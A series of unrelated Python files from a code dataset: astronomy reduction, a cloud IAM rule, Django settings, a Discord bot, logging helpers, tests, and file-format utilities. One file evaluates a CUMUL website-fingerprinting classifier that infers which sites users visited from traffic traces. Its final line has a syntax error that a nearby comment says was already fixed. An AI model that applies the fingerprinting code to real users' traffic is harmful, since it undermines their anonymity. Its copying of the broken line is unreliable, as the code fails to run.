        '\n\n>> Please complete the Heliocentric Velocity Correction & aperture attraction manually through PyRAF in bash:\n\n')
    # Print out the code to be used in PyRAF through bash.
    print('rvcorrect images={}'.format(fc_file))
    print('dopcor {} {} isvel+'.format(fc_file, hc_file))
    print('rvcorrect images={}'.format(fc_err_file))
    print('dopcor {} {} isvel+'.format(fc_err_file, hc_err_file))
    print(
        '\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\nData Reduction Completed for {}!\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n'.format(
            basename))
    print(
        '\n\n>> Remember to apply Galactic Extinction Correction!:\n\n')
    return None
'''
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Apply Corrections
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
'''
def correct(basename):
    '''
    Runs the full calibration sequence for one object: applies the flux
    calibration, then prints the PyRAF commands needed to finish the
    heliocentric velocity correction by hand.

    :param basename [String]: Basename of the FITS file.  The 1-sigma error
        file is assumed to be named ``err_<basename>.fits``.
    :return: None
    '''
    science_frame = '{}.fits'.format(basename)
    error_frame = 'err_{}.fits'.format(basename)
    # Flux calibration first; it returns the names of the corrected frames.
    flux_frame, flux_error_frame = flux(science_frame, error_frame, basename)
    # Then emit the manual heliocentric-velocity-correction instructions.
    velcor(flux_frame, flux_error_frame, basename)
    return None
'''
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Run Program
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
'''
# Set file path of data.  (raw_input => this script targets Python 2.)
path = raw_input('Please enter the path of the working directory: ')
# Change to path.
os.chdir(path)
# Specify which file you're working with. This program assumes the main file and 1 sigma error file have the same basename.
# I.e:
# basename.fits and err_basename.fits
# where basename is the name of the astronomical object.
basename = raw_input('Please enter filename (without extension) of the galaxy\'s FITS file: ')
# Run the main program.
correct(basename)
| StarcoderdataPython |
172348 | <filename>cloudrail/knowledge/rules/aws/non_context_aware/iam_no_human_users_rule.py
from typing import Dict, List
from cloudrail.knowledge.context.aws.aws_environment_context import AwsEnvironmentContext
from cloudrail.knowledge.rules.aws.aws_base_rule import AwsBaseRule
from cloudrail.knowledge.rules.base_rule import Issue
from cloudrail.knowledge.rules.rule_parameters.base_paramerter import ParameterType
class IamNoHumanUsersRule(AwsBaseRule):
    """Flags IAM users that have console access (a login profile) and are
    therefore considered human users."""

    def execute(self, env_context: AwsEnvironmentContext, parameters: Dict[ParameterType, any]) -> List[Issue]:
        issues: List[Issue] = []
        for user in env_context.users:
            # A user is "human" when a login profile with the same name and
            # account exists (i.e. the user can sign in to the console).
            has_console_access = any(
                user.name == profile.name and user.account == profile.account
                for profile in env_context.users_login_profile
            )
            if has_console_access:
                issues.append(
                    Issue(
                        f'The {user.get_type()} `{user.get_friendly_name()}` has console access, '
                        f'and so is considered human',
                        user,
                        user,
                    )
                )
        return issues

    def get_id(self) -> str:
        return "non_car_iam_no_human_users"

    def should_run_rule(self, environment_context: AwsEnvironmentContext) -> bool:
        # Only meaningful when both users and login profiles are present.
        return bool(environment_context.users and environment_context.users_login_profile)
| StarcoderdataPython |
3260434 | <reponame>rgreinho/pyconsql<gh_stars>0
"""Define the connexion settings for a local setup."""
import os
# pylint: disable=wildcard-import,unused-wildcard-import
from pyconsql.api.settings.common import * # noqa
DEBUG = True
if os.environ.get("KUBERNETES_PORT"):
minikube_ip = os.environ.get("MINIKUBE_IP", "192.168.99.100")
BASE_URL = f"http://api.{minikube_ip}.nip.io"
else:
BASE_URL = f"http://0.0.0.0:{PORT}" # noqa: F405
DATABASE = {
"URI": "sqlite:///petstore.db",
}
| StarcoderdataPython |
1627165 | #!/usr/bin/env python
"""
Copy the configuration file from the repository to the current directory, for editing.
"""
import argparse
import os
import sys
import yaml
import textwrap
from XtDac.ChandraUtils import logging_system
from XtDac.data_files import get_data_file_path
from XtDac.ChandraUtils.sanitize_filename import sanitize_filename
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Create a configuration file')
parser.add_argument("-o", "--output", help="Name for the new configuration file", type=str, required=True)
# Now get the parameters from the config file and add them as command line options
conf_file_template = get_data_file_path('sample_configuration.yml')
with open(conf_file_template, "r") as f:
tokens = []
current_comment = ''
current_name = ''
current_value = ''
for line in f.xreadlines():
if line[0]=='\n':
# Empty line, skip
continue
elif line[0]=='#':
# This is a comment
current_comment += line.replace("#"," ").replace("%", " percent")
else:
# Value
current_name = line.split(":")[0].lstrip().rstrip().replace(" ","_")
current_value = line.split(":")[1].lstrip().replace("\n","")
tokens.append((current_comment.lstrip().rstrip().replace("\n"," ").replace(" "," "),
current_name, current_value))
current_comment = ''
current_name = ''
current_value = ''
for (comment, name, value) in tokens:
if name.find("repository") > 0:
parser.add_argument("--%s" % name, help=comment, required=True)
else:
parser.add_argument("--%s" % name, help=comment, default=value)
# Get the logger
logger = logging_system.get_logger(os.path.basename(sys.argv[0]))
args = parser.parse_args()
# Now make sure that all 3 repositories are different from each other
# NOTE: this is a set, hence its entries are kept unique
directories = {sanitize_filename(args.data_repository),
sanitize_filename(args.region_repository),
sanitize_filename(args.output_repository)}
assert len(directories) == 3, "The data, region and output repositories must point at different directories"
# Load configuration file from the code repository
with open(conf_file_template) as f:
template = yaml.safe_load(f)
with open(args.output, "w+") as f:
for (comment, name, value) in tokens:
# Write comment
comment_lines = textwrap.wrap(comment, 80)
for line in comment_lines:
f.write("# %s\n" % line)
name_with_spaces = name.replace("_", " ")
assert name_with_spaces in template
# Write key : value pair
if name_with_spaces.find("repository") > 0 or name_with_spaces == 'work directory':
# Take absolute path
abs_path = sanitize_filename(args.__getattribute__(name))
# Create if needed
if not os.path.exists(abs_path):
logger.info("Directory %s does not exist, creating it" % abs_path)
try:
os.makedirs(abs_path)
except OSError:
logger.error("Could not create directory %s" % abs_path)
f.write("%s : %s\n\n" % (name_with_spaces, abs_path))
else:
f.write("%s : %s\n\n" % (name_with_spaces, args.__getattribute__(name))) | StarcoderdataPython |
141887 | # JANKENPOOP
import nextcord
import config
from nextcord.ext import commands
# Bot instance: commands are invoked with the "janken " prefix.
client = commands.Bot(command_prefix = 'janken ')
# Presence/activity text shown on the bot's profile.
game = nextcord.Game("Legacy Code Course")
@client.event
async def on_ready():
    # Fired once the gateway connection is ready: set idle status + activity.
    await client.change_presence(status=nextcord.Status.idle, activity=game)
    print("JANKENPOPP IS HERE HAHAHAHAHAHAH")
@client.command()
async def ping(ctx):
    # "janken ping": reply with the websocket latency in whole milliseconds.
    await ctx.send(f'hey im the best in the world annd is the best programmer and think you can see my latency well i am the fastest in the world but here you go but remember i am the best, pong!: `{round(client.latency * 1000)}ms rtt`')
@client.command()
async def windows96(ctx):
    # "janken windows96": reply with a link.
    # NOTE(review): the command is named windows96 but links windows93.net — confirm intended.
    await ctx.send("WHAT WHAT IS THIS TRASH YOU MAY BE BETTER AT: https://windows93.net")
# Start the bot (blocking call). The token is read from config.py.
client.run(config.TOKEN)
155963 | <filename>tbonlineproject/RegistrationRecaptcha/forms.py<gh_stars>0
from registration.forms import RegistrationForm
from CommentRecaptcha.fields import ReCaptchaField
class RegistrationFormRecaptcha(RegistrationForm):
    """django-registration form extended with a reCAPTCHA challenge field
    to deter automated sign-ups."""

    recaptcha = ReCaptchaField()
1651645 | #! /usr/bin/env python3
# coding=utf-8
"""
Contains all logging related tools and logging settings.
"""
import argparse
import functools
import logging
import os
import pprint
import sys
# Map the --verbose command line argument (a level name such as "DEBUG")
# to the corresponding `logging` module level constant.
_string_to_level = {
    "DEBUG": logging.DEBUG,
    "INFO": logging.INFO,
    "WARNING": logging.WARNING,
    "ERROR": logging.ERROR,
}
def logged(function):
    """
    Decorator that logs (at DEBUG level) the arguments and return value of
    every call to the function it decorates.

    Usage:

        @logging_tools.logged
        def func():
            // code

    :param function: a python function
    :type function: python function
    """

    @functools.wraps(function)
    def logged_function(*args, **kwargs):
        """
        Log debug information before and after the wrapped function runs.
        """
        # pprint.pformat is expensive; skip all formatting work entirely
        # unless DEBUG records would actually be emitted by the root logger.
        debug_enabled = logging.getLogger().isEnabledFor(logging.DEBUG)

        if debug_enabled:
            # Lazy %-style arguments defer the final string interpolation to
            # the logging framework (standard logging best practice).
            logging.debug("Begin function: %s", function.__name__)
            logging.debug("Arguments:\n%s", pprint.pformat(args))
            logging.debug("Keyword arguments:\n%s", pprint.pformat(kwargs))

        return_value = function(*args, **kwargs)

        if debug_enabled:
            logging.debug("End function: %s", function.__name__)
            logging.debug(
                "Return type(%s):\n%s", type(return_value), pprint.pformat(return_value)
            )

        return return_value

    return logged_function
class Logger:
    """
    Instantiating this class enables logging.

    Automatically adds verbosity options (-v, --verbose, --log) to your command
    line options.  If using argparse.ArgumentParser() to parse arguments, pass
    the parser as an argument to this class when instantiating it so the
    options are added to your current command line options.
    """

    def __init__(
        self,
        subcommand,
        filename=None,
        format="[%(levelname)s]: %(message)s",
        level=logging.WARNING,
        parser=None,
    ):
        """
        :param subcommand: Name used in the INFO-level log prefix.
        :type subcommand: string
        :param filename: If a filename is passed in and the --log command line
            option is given, the logger will use that filename for the log file.
            Otherwise a timestamped file in the current directory is used.
        :type filename: string
        :param format: The format for the log output. Please see the python
            logging documentation for more info.
        :type format: string
        :param level: One of the logging levels DEBUG, INFO, WARNING, ERROR.
            The command line argument will override this.
        :type level: int
        :param parser: If using argparse, pass the argument parser to this class
            to add the verbose flags to it.  When omitted, a fresh parser is
            created for this instance.
        :type parser: argparse.ArgumentParser
        """
        # BUG FIX: the parameter used to default to `argparse.ArgumentParser()`,
        # a single instance created at function-definition time (the classic
        # mutable-default-argument pitfall).  Instantiating Logger twice then
        # raised argparse.ArgumentError because '-v' was added to the same
        # parser twice.  Create a fresh parser per instance instead.
        if parser is None:
            parser = argparse.ArgumentParser()

        self.subcommand = subcommand
        self.filename = filename
        self.file_handle = None
        self.format = format
        self.level = level

        parser.add_argument(
            "-v",
            default=0,
            help="Print out additional details while the program is running.",
            action="count",
        )
        parser.add_argument(
            "--verbose",
            default=self.level,
            help="DEBUG, INFO, WARNING, ERROR. Default is WARNING.",
            metavar="LEVEL",
        )
        parser.add_argument(
            "--log",
            default=False,
            help="Write to log file at max verbosity level.",
            action="store_true",
        )
        options, _ = parser.parse_known_args()

        # --verbose (a level name) wins over -v; translate it to a level int.
        if options.verbose != self.level:
            # not the default
            try:
                options.verbose = _string_to_level[options.verbose.upper()]
            except (AttributeError, KeyError):
                logging.warning("Invalid logging level. Using WARNING")
                logging.warning("DEBUG, INFO, WARNING or ERROR are available.")
                options.verbose = logging.WARNING
        elif options.v:
            # -vv (or more) means DEBUG; a single -v means INFO.
            if options.v > 1:
                options.v = logging.DEBUG
            elif options.v > 0:
                options.v = logging.INFO
            options.verbose = options.v

        self.level = options.verbose

        # Detailed format (source location) for DEBUG, file logging, or the
        # default WARNING-and-above case; short subcommand prefix for INFO.
        if options.verbose == logging.DEBUG or options.log or options.verbose >= logging.WARNING:
            self.format = (
                "[%(levelname)s][%(filename)s:%(lineno)s][%(funcName)s]: %(message)s"
            )
        elif options.verbose == logging.INFO:
            self.format = f"[%(levelname)s][{self.subcommand}]: %(message)s"

        # logging and stdout/stderr have different handles with the python logging package
        handlers = []

        if options.log:
            self.level = logging.DEBUG
            if not filename:
                import time

                timestamp = time.strftime("%Y%m%d_%H%M%S")
                self.filename = os.getcwd() + "/" + timestamp + ".log"
            print("Log filename: ", self.filename)

            # Redirect python package logging output to log file
            # Does not catch prints or stdout/stderr
            logging_file_handler = logging.FileHandler(filename=self.filename)
            handlers.append(logging_file_handler)

            # Redirect stdout/stderr to logfile
            # NOTE(review): "r+" requires the file to exist (FileHandler just
            # created it) and writes from offset 0 — confirm "a" wasn't intended.
            self.file_handle = open(self.filename, "r+")
            sys.stdout = self.file_handle
            sys.stderr = self.file_handle

        stdout_handler = logging.StreamHandler(sys.stdout)
        handlers.append(stdout_handler)

        logging.basicConfig(format=self.format,
                            level=self.level,
                            handlers=handlers)

    def __del__(self):
        # Close the stdout/stderr redirect target if --log opened one.
        if self.file_handle:
            self.file_handle.close()
| StarcoderdataPython |
3335372 | <reponame>smevirtual/aperte
# Copyright 2018 SME Virtual Network Contributors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Django settings for project development environments. These settings are
intended to be used with deploying this project into a Docker container.
"""
# pylint: disable=C0111,W0232
# Standard Library
import environ
import socket
# Third Party
from configurations import values
from .common import Common
class Development(Common):
    """Django settings for local/Docker development: DEBUG on, dev tooling
    (django-extensions, devrecargar, debug-toolbar) enabled."""

    # See https://docs.djangoproject.com/en/2.0/ref/settings/ for a description
    # of each Django setting.

    env = environ.Env()

    # CORE SETTINGS
    # --------------------------------------------------------------------------
    DEBUG = values.BooleanValue(True)

    # Hosts allowed to see debug-toolbar output (localhost + VirtualBox host).
    INTERNAL_IPS = [
        '127.0.0.1',
        '10.0.2.2',
    ]

    # INSTALLED APPS SETTINGS
    # --------------------------------------------------------------------------
    Common.INSTALLED_APPS += [
        'django_extensions',
        'devrecargar',
        'debug_toolbar',
    ]

    # MIDDLEWARE SETTINGS
    # --------------------------------------------------------------------------
    # The debug-toolbar middleware must come first in the chain.
    MIDDLEWARE = [
        'debug_toolbar.middleware.DebugToolbarMiddleware',
    ] + Common.MIDDLEWARE

    # EMAIL SETTINGS
    # --------------------------------------------------------------------------
    # NOTE(review): Django's setting name is EMAIL_HOST — "MAIL_HOST" is
    # likely a typo; confirm.
    MAIL_HOST = 'localhost'
    EMAIL_PORT = 1025
    EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'

    # django-cors-headers SETTINGS
    # --------------------------------------------------------------------------
    # TODO: Re-enable this.
    # CORS_ORIGIN_WHITELIST = []

    # django-debug-toolbar SETTINGS
    # --------------------------------------------------------------------------
    DEBUG_TOOLBAR_CONFIG = {
        'DISABLE_PANELS': [
            'debug_toolbar.panels.redirects.RedirectsPanel',
        ],
        'SHOW_TEMPLATE_CONTEXT': True,
    }

    if env.bool('DJANGO_USE_DOCKER', default=True):
        # This is required for the 'django-debug-toolbar' to work with Docker:
        # whitelist the Docker network gateway (container IP with last octet 1).
        hostname, _, ips = socket.gethostbyname_ex(socket.gethostname())
        INTERNAL_IPS += [ip[:-1] + '1' for ip in ips]

    # devrecargar SETTINGS
    # --------------------------------------------------------------------------
    # Auto-reload the browser when templates/static assets change.
    DEVRECARGAR_PATHS_TO_WATCH = [{
        'path': str(Common.APPS_ROOT_DIR),
        'patterns': ['*.html', '*.js', '*.css'],
    }]
| StarcoderdataPython |
3327040 | <filename>plugins/titlegiver/test/test_titlegiver.py
# coding=utf-8
import threading
import urllib
import os
import json
import urllib.parse
import unittest
import http.server
from plugins.titlegiver.titlegiver import Titlegiver
__author__ = "tigge"
__author__ = "reggna"
class Handler(http.server.BaseHTTPRequestHandler):
    """Tiny HTTP server used by the tests.

    Routes:
      /redirect?count=N&url=U  -> chain of N HTTP 301 redirects ending at U
      /page                    -> a minimal fixed HTML page
      /pages/<name>            -> files served from the test data directory
    """

    def redirect(self):
        # Serve one hop of a redirect chain of length ``count``.
        remaining = int(self.url_queries["count"][0])
        target = self.url_queries["url"][0]
        if remaining > 1:
            target = "redirect?count={0}&url={1}".format(
                remaining - 1, self.url_queries["url"][0]
            )
        self.send_response(301)
        self.send_header("Location", target)
        self.end_headers()
        body = "<html><head><title>Redirect</title></head><body>See {0}</body></html>".format(
            target
        )
        self.wfile.write(body.encode("utf-8"))

    def page(self):
        # A fixed, minimal HTML page.
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()
        body = "<html><head><title>Simple</title></head><body>Simple</body></html>"
        self.wfile.write(body.encode("utf-8"))

    def pages(self):
        # Serve a file relative to this test module, with optional headers
        # taken from a JSON side-car file with a ``.header`` extension.
        self.send_response(200)
        base = os.path.join("..", os.path.dirname(__file__))

        try:
            with open(base + "/" + urllib.parse.unquote(self.path) + ".header") as fp:
                for header, value in json.load(fp).items():
                    self.send_header(header, value)
        except IOError:
            # Default headers when no side-car file is found.
            self.send_header("Content-Type", "text/html; charset=utf-8")
        self.end_headers()

        # Substitute the placeholder with this server's real address.
        address = "localhost:{}".format(self.server.server_port).encode("ascii")
        with open(base + "/" + urllib.parse.unquote(self.path), "br") as fp:
            self.wfile.write(fp.read().replace("$ADDRESS".encode("ascii"), address))

    def do_GET(self):
        # Dispatch on the path component of the request URL.
        self.url_parts = urllib.parse.urlparse(self.path)
        self.url_queries = urllib.parse.parse_qs(self.url_parts.query)
        route = self.url_parts.path
        if route == "/redirect":
            self.redirect()
        elif route == "/page":
            self.page()
        elif route.startswith("/pages"):
            self.pages()

    def log_message(self, format, *args):
        # Keep the test output quiet.
        return
class TitlegiverTestCase(unittest.TestCase):
    """Exercises Titlegiver.get_title_from_url against a local HTTP server
    (see Handler above) serving redirects, fixed pages, and files from the
    test data directory."""

    @classmethod
    def setUpClass(cls):
        # Start the fixture HTTP server on an ephemeral port in a thread.
        cls.http_server = http.server.HTTPServer(("", 0), Handler)
        cls.http_server_thread = threading.Thread(target=cls.http_server.serve_forever)
        cls.http_server_thread.start()
        cls.URL = "http://localhost:{}".format(cls.http_server.server_port)

    @classmethod
    def tearDownClass(cls):
        # Stop and release the fixture server.
        cls.http_server.shutdown()
        cls.http_server.server_close()
        cls.http_server_thread.join()

    def test_redirect(self):
        # Titles must be resolved through a chain of HTTP 301 redirects.
        url = self.URL + "/page"
        result = Titlegiver.get_title_from_url(
            self.URL + "/redirect?count=10&url={0}".format(url)
        )
        self.assertEqual(result, u"Simple")

    def test_meta_redirect(self):
        # <meta http-equiv="refresh"> redirects must be followed.
        result = Titlegiver.get_title_from_url(self.URL + "/pages/meta_redirect")
        self.assertEqual(result, u"Simple")

    def test_meta_redirect_in_noscript(self):
        # Meta-refresh inside <noscript> must NOT be followed.
        result = Titlegiver.get_title_from_url(
            self.URL + "/pages/meta_redirect_in_noscript"
        )
        self.assertEqual(result, u"Title without refreshing")

    def test_specialchars(self):
        result = Titlegiver.get_title_from_url(self.URL + "/pages/specialchar")
        self.assertEqual(
            result,
            u"Title with special characters §½!\"@#£¤$%&/{([)]=}+?\`´'^~*'<>|,;.:-_",
        )

    def test_linebreaks(self):
        # Newlines/carriage returns inside <title> must be collapsed.
        result = Titlegiver.get_title_from_url(self.URL + "/pages/linebreaks")
        self.assertEqual(result, u"Title with line breaks and carriage returns")

    def test_attributes(self):
        # A <title> tag carrying attributes must still be parsed.
        result = Titlegiver.get_title_from_url(self.URL + "/pages/attributes")
        self.assertEqual(result, u'Title with attribute id="pageTitle"')

    def test_entities(self):
        # XML/HTML/numeric entities must be decoded; invalid ones left as-is.
        result = Titlegiver.get_title_from_url(self.URL + "/pages/entities")
        self.assertEqual(
            result,
            u"Title with entities. "
            u'XML: "& '
            u"HTML: <Å©†♥ "
            u"Int/hex: Hello "
            u"Invalid: #k;�&fail;",
        )

    def test_nonascii(self):
        # Non-ASCII characters in the URL path must be handled.
        result = Titlegiver.get_title_from_url(self.URL + "/pages/nönàscii")
        self.assertEqual(result, u"Page with nön-àscii path")

    # The following tests cover charset detection from various sources.
    def test_encoding_bom(self):
        result = Titlegiver.get_title_from_url(self.URL + "/pages/encoding_bom")
        self.assertEqual(result, u"Gådzölla - ゴジラ")

    def test_encoding_xmldecl(self):
        result = Titlegiver.get_title_from_url(self.URL + "/pages/encoding_xmldecl")
        self.assertEqual(result, u"Samoraj - 武家")

    def test_encoding_meta_charset(self):
        result = Titlegiver.get_title_from_url(
            self.URL + "/pages/encoding_meta_charset"
        )
        self.assertEqual(result, u"Россия-Матушка")

    def test_encoding_meta_httpequiv(self):
        result = Titlegiver.get_title_from_url(
            self.URL + "/pages/encoding_meta_httpequiv"
        )
        self.assertEqual(result, u"올드보이")

    def test_split_strip_and_slice(self):
        # Helper: split a title into at most N stripped lines.
        title = Titlegiver.get_title_from_url(self.URL + "/pages/linebreaks_with_cr")
        result = Titlegiver.split_strip_and_slice(title, 2)
        self.assertEqual(result, [u"Line1", "Line2"])
| StarcoderdataPython |
1720136 | <reponame>eddyydde/wikitablestosql
import os
import csv
import bz2
def prepare_parts_using_index(data_directory, file, index, done=0):
    """
    Prepare parts by cutting a multistream bz2 file according to its index.
    Also prepares the directory that will receive the decompressed parts.

    :param data_directory: path as string (contains both data and index files)
    :param file: filename of the multistream bz2 file, as string
    :param index: filename of the bz2-compressed index, as string
    :param done: for naming purposes (prefix of the parts directory), as int
    :return: process information as dict (index filename, parts directory,
        last part name, decompression directory)
    """
    # Decompress the bz2 index into the current working directory.
    decompressed_index_filename = os.path.splitext(index)[0]
    with bz2.open(os.path.join(data_directory, index), mode='rb') as indexf:
        decompressed_index = indexf.read()
    with open(decompressed_index_filename, mode='wb') as decomp_index_file:
        decomp_index_file.write(decompressed_index)

    # Parse the "offset:id:title" index lines into a list of unique,
    # in-order stream byte offsets.
    byte_offsets = []
    with open(decompressed_index_filename, encoding='UTF-8') as csv_file:
        csv_index = csv.reader(csv_file, delimiter=':')
        for row in csv_index:
            offset = int(row[0])
            # Offsets repeat for every article inside a stream; keep each once.
            if not byte_offsets or offset != byte_offsets[-1]:
                byte_offsets.append(offset)

    parts_directory = str(done) + 'parts' + '_' + file
    # exist_ok avoids the racy "check os.listdir() then mkdir" pattern and
    # works regardless of the current working directory's contents.
    os.makedirs(parts_directory, exist_ok=True)

    # Cut the multistream file: one part per interval between offsets.
    with open(os.path.join(data_directory, file), mode='rb') as f:
        for i in range(len(byte_offsets) - 1):
            with open(os.path.join(parts_directory, 'part' + '_' + str(i + 1) + '_' + file), mode='wb') as pf:
                f.seek(byte_offsets[i])
                pf.write(f.read(byte_offsets[i + 1] - byte_offsets[i]))
        # The final part runs from the last offset to end-of-file.
        f.seek(byte_offsets[-1])
        last_part_name = 'part' + '_' + str(len(byte_offsets)) + '_' + file
        with open(os.path.join(parts_directory, last_part_name), mode='wb') as lpf:
            lpf.write(f.read())

    # Prepare the directory that decompress_part() will write into.
    decompression_directory = 'decompressed' + '_' + parts_directory
    os.makedirs(decompression_directory, exist_ok=True)

    return {'decompressed_index_filename': decompressed_index_filename, 'parts_directory': parts_directory,
            'last_part_name': last_part_name, 'parts_decompression_directory': decompression_directory}
def decompress_part(parts_directory, part_file, parts_decompression_directory):
    """
    Decompress one part file.
    :param parts_directory: path as string
    :param part_file: filename as string
    :param parts_decompression_directory: path as string
    :return: name of the decompressed file as string
    """
    stem = os.path.splitext(part_file)[0]
    decompressed_filename = 'decompressed' + '_' + stem
    source_path = os.path.join(parts_directory, part_file)
    target_path = os.path.join(parts_decompression_directory, decompressed_filename)
    with bz2.open(source_path, mode='rb') as compressed:
        with open(target_path, mode='wb') as target:
            target.write(compressed.read())
    return decompressed_filename
| StarcoderdataPython |
from cdm.objectmodel import CdmCorpusDefinition, CdmManifestDefinition
from cdm.storage import LocalAdapter
from cdm.enums import CdmObjectType
def generate_manifest(local_root_path: str) -> 'CdmManifestDefinition':
    """
    Creates a manifest used for the tests.

    The same local adapter is mounted under both the 'local' and 'cdm'
    namespaces, and 'local' is made the default namespace.
    """
    corpus = CdmCorpusDefinition()
    corpus.storage.default_namespace = 'local'
    adapter = LocalAdapter(root=local_root_path)
    for namespace in ('local', 'cdm'):
        corpus.storage.mount(namespace, adapter)
    manifest = CdmManifestDefinition(corpus.ctx, 'manifest')
    manifest.folder_path = '/'
    manifest.namespace = 'local'
    return manifest
def create_document_for_entity(cdm_corpus: 'CdmCorpusDefinition', entity: 'CdmEntityDefinition', nameSpace: str = 'local'):
    """
    For an entity, it creates a document that will contain the entity.

    The document is named '<entity_name>.cdm.json', attached to the root
    folder of *nameSpace*, and the entity is appended to its definitions.
    """
    root_folder = cdm_corpus.storage.fetch_root_folder(nameSpace)
    doc_name = '{}.cdm.json'.format(entity.entity_name)
    entity_doc = cdm_corpus.ctx.corpus.make_object(CdmObjectType.DOCUMENT_DEF, doc_name, False)
    root_folder.documents.append(entity_doc)
    entity_doc.definitions.append(entity)
    return entity_doc
| StarcoderdataPython |
import math
from construct import *
# "Why not use PIL" - PIL can read, but, as far as I could tell, won't natively create
# real, true, 16 color bmp. You can make a 16 color image just fine, but when you save it,
# it'll be formatted as a 256 color image. Maybe I'm wrong!
# Declarative layout of a 16-color (4 bpp) uncompressed BMP file, built with
# the `construct` library so it can both parse and emit real 4-bit bitmaps.
bitmap_struct = Struct(
    "signature" / Const(b"BM"),
    # total size: 14-byte file header + 40-byte info header + pixel data
    "file_size" / Rebuild(Int32ul, lambda ctx: 14 + 40 + int((ctx.height * ctx.width * ctx.bpp) / 8)),
    Padding(4),  # reserved fields
    # offset to the pixel array: headers + palette (palette only for <= 8 bpp)
    # NOTE(review): the Python ternary's condition here is a construct `this`
    # expression object evaluated at definition time, so the else-branch may
    # never be selectable — verify against the construct docs if bpp > 8 is
    # ever needed (the "bpp" field below is Const(4) today, so it is moot).
    "data_offset" / Rebuild(Int32ul, 14 + 40 + ((2 ** this.bpp if this.bpp <= 8 else 0) * 4)),
    "header_size" / Const(40, Int32ul),
    "width" / Int32sl,
    "height" / Int32sl,
    "planes" / Int16ul,
    "bpp" / Const(4, Int16ul),  # bits per pixel
    "compression" / Const(0, Int32ul),  # BI_RGB, i.e. uncompressed
    "image_data_size" / Rebuild(Int32ul, lambda ctx: int((ctx.height * ctx.width * ctx.bpp) / 8)),
    # NOTE(review): these derive the resolution from pixel dimensions via
    # 39.3701 in/m * 72 — presumably intended as pixels-per-metre; confirm.
    "horizontal_dpi" / Rebuild(Int32ul, lambda ctx: int(math.ceil(39.3701 * 72 * ctx.width))),
    "vertical_dpi" / Rebuild(Int32ul, lambda ctx: int(math.ceil(39.3701 * 72 * ctx.height))),
    "colors_used" / Int32ul,
    "important_colors" / Int32ul,
    # palette entries are stored BGR + 1 padding byte; present only for
    # indexed (<= 8 bpp) images
    "palette" / Array(
        lambda ctx: 2 ** ctx.bpp if ctx.bpp <= 8 else 0,
        Struct(
            "B" / Int8ul,
            "G" / Int8ul,
            "R" / Int8ul,
            Padding(1)
        )
    ),
    # rows of 4-bit pixels (nibbles); each row is padded to a 4-byte boundary
    "pixels" / Array(this.height, Aligned(4, Bitwise(Aligned(8, Array(this.width, Nibble))))),
)
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
This is for experiment: random number of splits
@author: aaron
"""
from main import *
import glob
import multiprocessing as mp
import os
from extract import *
import joblib
logger = logging.getLogger('cumul')
def parse_arguments():
    """Parse CLI options for the evaluation run and configure logging.

    Returns the parsed argparse namespace.
    """
    parser = argparse.ArgumentParser(description='Evaluate.')
    parser.add_argument('-m', metavar='<model path>',
                        help='Path to the directory of the model')
    parser.add_argument('-p', metavar='<raw trace path>')
    parser.add_argument('-o', metavar='<feature path>',
                        help='Path to the directory of the extracted features')
    parser.add_argument('-mode', metavar='<head or other>',
                        help='To test head or other')
    parser.add_argument('--log', type=str, dest="log",
                        metavar='<log path>', default='stdout',
                        help='path to the log file. It will print to stdout by default.')
    # Parse arguments
    args = parser.parse_args()
    config_logger(args)
    return args
def extractfeature(f):
    """Parse one raw trace file and return (features, label).

    Monitored traces are named "<site>-<instance>", so the site id before the
    dash becomes the label; anything else is labelled MON_SITE_NUM
    (unmonitored). Returns None (after printing the error) on any failure.
    """
    global MON_SITE_NUM
    fname = f.split('/')[-1].split(".")[0]
    try:
        features = extract(parse(f))
        label = int(fname.split('-')[0]) if '-' in fname else int(MON_SITE_NUM)
        return (features, label)
    except Exception as e:
        print(e)
        return None
def pred_sing_trace(fdirs, scaler, model, prtype):
    """Predict a label for each raw trace and dump results to predresult.txt.

    The output directory is derived from the first trace's path components
    plus *prtype*; one "<trace-name>\\t<prediction>" line is written per file.
    """
    features = [extractfeature(f)[0] for f in fdirs]
    X_test = scaler.transform(features)
    y_pred = model.predict(X_test)
    outputdir = os.path.join(ct.randomdir,
                             fdirs[0].split('/')[-3],
                             fdirs[0].split('/')[-2] + "_" + prtype)
    if not os.path.exists(outputdir):
        os.makedirs(outputdir)
    resultfile = os.path.join(outputdir, 'predresult.txt')
    with open(resultfile, 'w') as f:
        for i, filename in enumerate(fdirs):
            trace_name = filename.split("/")[-1].split('.')[0]
            f.write(trace_name + '\t' + str(y_pred[i]) + '\n')
if __name__ == '__main__':
    global MON_SITE_NUM
    args = parse_arguments()
    logger.info("Arguments: %s" % (args))
    cf = read_conf(ct.confdir)
    MON_SITE_NUM = int(cf['monitored_site_num'])
    model = joblib.load(args.m)
    logger.info('loading original data...')
    dic = np.load(args.o, allow_pickle=True).item()
    X = np.array(dic['feature'])
    y = np.array(dic['label'])
    # normalize the data: fit the scaler on the original training features so
    # the fresh traces are mapped into the same [-1, 1] range
    scaler = preprocessing.MinMaxScaler((-1, 1))
    scaler.fit(X)
    testfolder = args.p
    fdirs = glob.glob(os.path.join(args.p, '*'))
    # BUG FIX: this call previously ended with a stray trailing ':' which made
    # the whole module a SyntaxError.
    pred_sing_trace(fdirs, scaler, model, args.m.split('.')[1][-2:])
import math
import numpy as np
from tidyframe import Possibly
# Module-level sample: math.log wrapped so a failing call yields the Possibly
# fallback (NaN by default) instead of raising.
@Possibly()
def log_possibly(x):
    return math.log(x)
def test_Possibly_basic_success():
    # on valid input the wrapped function behaves exactly like math.log
    assert np.isclose(log_possibly(10), math.log(10)), 'Must result is True'
def test_pPossibly_basic_fail():
